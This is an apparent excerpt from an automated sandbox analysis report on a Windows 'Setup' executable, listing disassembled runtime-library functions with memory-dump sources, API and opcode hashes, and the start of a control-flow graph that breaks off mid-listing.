                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: gfffffff
                                                                                                                                                                                                            • API String ID: 3215553584-1523873471
                                                                                                                                                                                                            • Opcode ID: fdc06be651123f2e45186d910181189a4e7059cc0654968315406f5b78ec3b1d
                                                                                                                                                                                                            • Instruction ID: b952ebcba216c9f1865eaac06f8869e9e4f1cc9cfc7875dbe98967f87a81d19e
                                                                                                                                                                                                            • Opcode Fuzzy Hash: fdc06be651123f2e45186d910181189a4e7059cc0654968315406f5b78ec3b1d
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 29917C63B093C5D6EB11DF26D440BBAAB90AB51BC4F698031CE4D67796DE3DE502D310
                                                                                                                                                                                                            Function 00007FF764A2D808 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 220COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A2D83E
                                                                                                                                                                                                              • Part of subcall function 00007FF764A2B4A0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF764A2B47D), ref: 00007FF764A2B4A9
                                                                                                                                                                                                              • Part of subcall function 00007FF764A2B4A0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF764A2B47D), ref: 00007FF764A2B4CE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: -
                                                                                                                                                                                                            • API String ID: 4036615347-2547889144
                                                                                                                                                                                                            • Opcode ID: 665d2312fef52135513e99e420dbdfc9f70daf26bcfcf03bc9d5dcdc90619522
                                                                                                                                                                                                            • Instruction ID: 29a9aa720345867770172db0a4d4a4d9cc71def2b2e8d3becced53d7d9a43e93
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 665d2312fef52135513e99e420dbdfc9f70daf26bcfcf03bc9d5dcdc90619522
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08910672A0C785D6E6609F269480B6BF691FF95790FA84235EA9D53B9ACB3CE400D700
                                                                                                                                                                                                            Function 00007FF764A31D84 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 165COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF764A31DB4
                                                                                                                                                                                                              • Part of subcall function 00007FF764A2B4A0: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF764A2B47D), ref: 00007FF764A2B4A9
                                                                                                                                                                                                              • Part of subcall function 00007FF764A2B4A0: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF764A2B47D), ref: 00007FF764A2B4CE
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: *?
                                                                                                                                                                                                            • API String ID: 4036615347-2564092906
                                                                                                                                                                                                            • Opcode ID: 3573897de4cbc01d3fe9d9088e4697f594729de275180852b5da56caf72081e9
                                                                                                                                                                                                            • Instruction ID: ef9a62cb1c419e35ba104d4abc6811abd15479a80e1330ea7eaacc9602af0551
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3573897de4cbc01d3fe9d9088e4697f594729de275180852b5da56caf72081e9
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5751F672B15759D5EB11EF63D8808B9ABA1FB48BD4BA44532EE1D47B85EF3CD0018320
                                                                                                                                                                                                            Function 00007FF764A384D8 Relevance: 3.2, APIs: 2, Instructions: 232COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExceptionRaise_clrfp
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 15204871-0
                                                                                                                                                                                                            • Opcode ID: 915cd531f7ef5b3065576ac8ab75f2fc8c3176eb62d7bcc4b950cb8e8de866a3
                                                                                                                                                                                                            • Instruction ID: cdf51a348305ca6a98a84c5ec97ae1de84134cc2112cf9a2684346bde8406977
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 915cd531f7ef5b3065576ac8ab75f2fc8c3176eb62d7bcc4b950cb8e8de866a3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1FB14A73A00B84CBEB16CF2AC882668B7E1F784B88F658825DA5DC77A4DF39D451C710
                                                                                                                                                                                                            Function 00007FF764A2EA5C Relevance: 1.9, APIs: 1, Instructions: 439COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: a8471c56c58d4322bd573e5f324ca75a2fc8a29bce925cb0ebef3c0f2010305a
                                                                                                                                                                                                            • Instruction ID: 8151f371958a38f3a328bf9b439e06b8a420f5f07805c3f1d893576b0316ed46
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a8471c56c58d4322bd573e5f324ca75a2fc8a29bce925cb0ebef3c0f2010305a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8702B421E09646E1FA65BF2394C1A7BD680AF05BA0FFC4735DE2D663D1EE3DA4416320
                                                                                                                                                                                                            Function 00007FF764A28E00 Relevance: 1.7, APIs: 1, Instructions: 195COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _get_daylight_invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 474895018-0
                                                                                                                                                                                                            • Opcode ID: e75d1316f7690e78a1b7bbe4b8fd434e354be019a45c5af86f04e4cb43f49289
                                                                                                                                                                                                            • Instruction ID: e3e44065f9a9ceff7be62db99877426eb0a27b9c05323b31d2cf6afded080bb9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e75d1316f7690e78a1b7bbe4b8fd434e354be019a45c5af86f04e4cb43f49289
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D71D922F0C142E5F7646E2694C0B7BE286BF40760FBC4739EA5D576D5DE3DE840A620
                                                                                                                                                                                                            Function 00007FF764A31F90 Relevance: 1.6, APIs: 1, Instructions: 146COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 4f61a71708abe6b8fd764cc3abb1ac03a169177ddefacac8889ebf8fd77858dc
                                                                                                                                                                                                            • Instruction ID: 16fc040cd6e3f74640427b072176f004ad66c7a31357181c1fe9d28683fcdab0
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f61a71708abe6b8fd764cc3abb1ac03a169177ddefacac8889ebf8fd77858dc
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C451D622B0869195F720EF73E9809AEBBA5AB407D4FA44235EE5C97B85DF3CD501C740
                                                                                                                                                                                                            Function 00007FF764A1DDD8 Relevance: 1.5, Strings: 1, Instructions: 206COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                            • API String ID: 3215553584-4108050209
                                                                                                                                                                                                            • Opcode ID: a558066dccb20300c2ed8870496e8d60fc2d09facd4851caef8dcd3dae15fdc6
                                                                                                                                                                                                            • Instruction ID: 2abdcbd3e68c42b7a4f120617a59c9d7dc86d6b52a5c141515d85dd535b18cbe
                                                                                                                                                                                                            • Opcode Fuzzy Hash: a558066dccb20300c2ed8870496e8d60fc2d09facd4851caef8dcd3dae15fdc6
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1D71E411A0C646E6FA66AE1B50C0BFAE7B29B51B48FE41135DD49076D9CF2DF842C321
                                                                                                                                                                                                            Function 00007FF764A1E05C Relevance: 1.4, Strings: 1, Instructions: 196COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                            • API String ID: 3215553584-4108050209
                                                                                                                                                                                                            • Opcode ID: 3599b47a282c3c01b9b0489b23f22b425611f643850141a40b2ffdc2dc5c9ed3
                                                                                                                                                                                                            • Instruction ID: 1004d28477dbcb93efabcde41e9a9471178402c8bfd3d7f59c6c615404bbb6dd
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3599b47a282c3c01b9b0489b23f22b425611f643850141a40b2ffdc2dc5c9ed3
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 73611B21A0D242E6FA666D1B5080FBBD7B29F55744FF80131DD490BFC9CE6DE8468321
                                                                                                                                                                                                            Function 00007FF764A21CD8 Relevance: .3, Instructions: 285COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 961a36b829703b04ce8db46bb0b4062e1a9c829ab9d839192e5b6f0db5d2305e
                                                                                                                                                                                                            • Instruction ID: ec1b93069247daad20006459087beb2b4a1ca51134e90fe43fa2cef04262829a
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 961a36b829703b04ce8db46bb0b4062e1a9c829ab9d839192e5b6f0db5d2305e
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4B914B36B18242D6FA656D279490BBB9A80BF40784FBC1139DD2E677C0DE3DE905E620
                                                                                                                                                                                                            Function 00007FF764A19ABC Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 4a1e12706ec43ec9c9275fc6a742fd6c23767f2cd031f8989d8cce6e74dae816
                                                                                                                                                                                                            • Instruction ID: 8c3ecffddbe76cbd9c0b47991f17643cd9e39945d25c23b266f6844cdded640c
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a1e12706ec43ec9c9275fc6a742fd6c23767f2cd031f8989d8cce6e74dae816
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39716A72B14155DAEA269F6BB558F7A7BA8F3447C8F925031DF4A07B44CA3CE404C760
                                                                                                                                                                                                            Function 00007FF764A28414 Relevance: .1, Instructions: 126COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 485612231-0
                                                                                                                                                                                                            • Opcode ID: 9a3a534b085362e43156d84b0566409aa2cee27b7730dda760b5abe8302e17e4
                                                                                                                                                                                                            • Instruction ID: ea98de99f8a9d04771a44645b44fcfe045330cf167a3ebbc9fef48cd527b5317
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9a3a534b085362e43156d84b0566409aa2cee27b7730dda760b5abe8302e17e4
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FE41E222714A5992FF04DF2BD9945AAB3A1BB8CFD4B999136EE0D97B58DE3CC0018300
                                                                                                                                                                                                            Function 00007FF764A2469C Relevance: .1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 6da283c75ea1dbc9bd88145ed251b46990280ded1a85bbeffe29480dd7970cb7
                                                                                                                                                                                                            • Instruction ID: f3641a385083175920f72de5c3f051c768d7b9b3e5b1ff6081d4d84fdaffa199
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6da283c75ea1dbc9bd88145ed251b46990280ded1a85bbeffe29480dd7970cb7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9C31A3B2E1C153E6F6797E2B85D4E3B9542AF83340EFC9030D52D26A89CC2DB5457920
                                                                                                                                                                                                            Function 00007FF764A38320 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000006.00000002.2039156006.00007FF764A11000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF764A10000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039138911.00007FF764A10000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039196885.00007FF764A39000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039223597.00007FF764A4A000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000006.00000002.2039267116.00007FF764A4D000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_7ff764a10000_Setup.jbxd
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                            • Opcode ID: 14798f9b8cc5b6a9c4efe69474c430c64b596e6a23c69794be42c2b676dbfa3b
                                                                                                                                                                                                            • Instruction ID: 29ccf9c6ef7db490f5641b09dd1523be932c2e6fb257f308918f1e31c0c752c4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14798f9b8cc5b6a9c4efe69474c430c64b596e6a23c69794be42c2b676dbfa3b
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1CF06871B19295DBEB949F2DA483A2D77D0E708380FA08039D78DC3B04D63C9054CF14
                                                                                                                                                                                                            Function 00007FF764A12BE4 Relevance: 75.3, APIs: 2, Strings: 48, Instructions: 330COMMON
                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                            control_flow_graph 522 7ff764a12be4-7ff764a12c25 523 7ff764a13098-7ff764a1309a 522->523 524 7ff764a12c2b-7ff764a12c2e 522->524 527 7ff764a130a7-7ff764a130ac 523->527 528 7ff764a1309c-7ff764a130a3 523->528 525 7ff764a1308e-7ff764a13093 524->525 526 7ff764a12c34-7ff764a12c4b call 7ff764a257e0 524->526 525->523 534 7ff764a13069-7ff764a1306b 526->534 535 7ff764a12c51-7ff764a12c62 call 7ff764a257e0 526->535 529 7ff764a1310c-7ff764a1310f 527->529 530 7ff764a130ae-7ff764a130b1 527->530 528->527 532 7ff764a13113-7ff764a13115 529->532 530->532 536 7ff764a13117-7ff764a13119 532->536 537 7ff764a1311d 532->537 540 7ff764a13071-7ff764a13080 call 7ff764a13de4 534->540 541 7ff764a13103-7ff764a1310a 534->541 535->534 547 7ff764a12c68-7ff764a12c79 call 7ff764a257e0 535->547 536->537 538 7ff764a13120 537->538 542 7ff764a13122-7ff764a13136 538->542 551 7ff764a13082-7ff764a13088 540->551 545 7ff764a130ba-7ff764a130cb call 7ff764a16630 541->545 545->538 553 7ff764a12c7b-7ff764a12c7d 547->553 554 7ff764a12c8c-7ff764a12c9d call 7ff764a257e0 547->554 551->524 551->525 555 7ff764a130b3 553->555 556 7ff764a12c83-7ff764a12c87 553->556 559 7ff764a130fb-7ff764a13101 554->559 560 7ff764a12ca3-7ff764a12cb4 call 7ff764a257e0 554->560 555->545 556->551 559->538 560->559 563 7ff764a12cba-7ff764a12ccb call 7ff764a257e0 560->563 563->559 566 7ff764a12cd1-7ff764a12ce2 call 7ff764a257e0 563->566 569 7ff764a12ce8-7ff764a12cf9 call 7ff764a257e0 566->569 570 7ff764a130f3-7ff764a130f9 566->570 573 7ff764a12cfb-7ff764a12d01 569->573 574 7ff764a12d06-7ff764a12d17 call 7ff764a257e0 569->574 570->538 573->551 577 7ff764a130eb-7ff764a130f1 574->577 578 7ff764a12d1d-7ff764a12d2e call 7ff764a257e0 574->578 577->538 581 7ff764a13060-7ff764a13067 578->581 582 7ff764a12d34-7ff764a12d45 call 7ff764a1124c 578->582 581->551 582->581 585 7ff764a12d4b-7ff764a12d5c call 7ff764a257e0 582->585 588 7ff764a12d6a-7ff764a12d7b call 7ff764a257e0 585->588 589 7ff764a12d5e-7ff764a12d65 585->589 595 7ff764a130cd-7ff764a130e9 call 7ff764a122a0 588->595 596 7ff764a12d81-7ff764a12d92 call 7ff764a257e0 588->596 590 7ff764a12e7e-7ff764a12e85 call 7ff764a117b4 589->590 590->551 595->542 601 7ff764a12da0-7ff764a12db1 call 7ff764a257e0 596->601 602 7ff764a12d94-7ff764a12d9b 596->602 605 7ff764a12dbf-7ff764a12dd0 call 7ff764a257e0 601->605 606 7ff764a12db3-7ff764a12dba 601->606 602->590 609 7ff764a12dde-7ff764a12def call 7ff764a257e0 605->609 610 7ff764a12dd2-7ff764a12dd9 605->610 606->590 613 7ff764a12dfd-7ff764a12e0e call 7ff764a257e0 609->613 614 7ff764a12df1-7ff764a12df8 609->614 610->590 617 7ff764a12e19-7ff764a12e2a call 7ff764a257e0 613->617 618 7ff764a12e10-7ff764a12e17 613->618 614->590 621 7ff764a12e2c-7ff764a12e33 617->621 622 7ff764a12e35-7ff764a12e46 call 7ff764a257e0 617->622 618->590 621->590 622->621 625 7ff764a12e48-7ff764a12e59 call 7ff764a257e0 622->625 628 7ff764a12e5b-7ff764a12e62 625->628 629 7ff764a12e64-7ff764a12e75 call 7ff764a257e0 625->629 628->590 632 7ff764a12e77 629->632 633 7ff764a12e8a-7ff764a12e9e call 7ff764a1124c 629->633 632->590 636 7ff764a12edb-7ff764a12ee9 call 7ff764a1124c 633->636 637 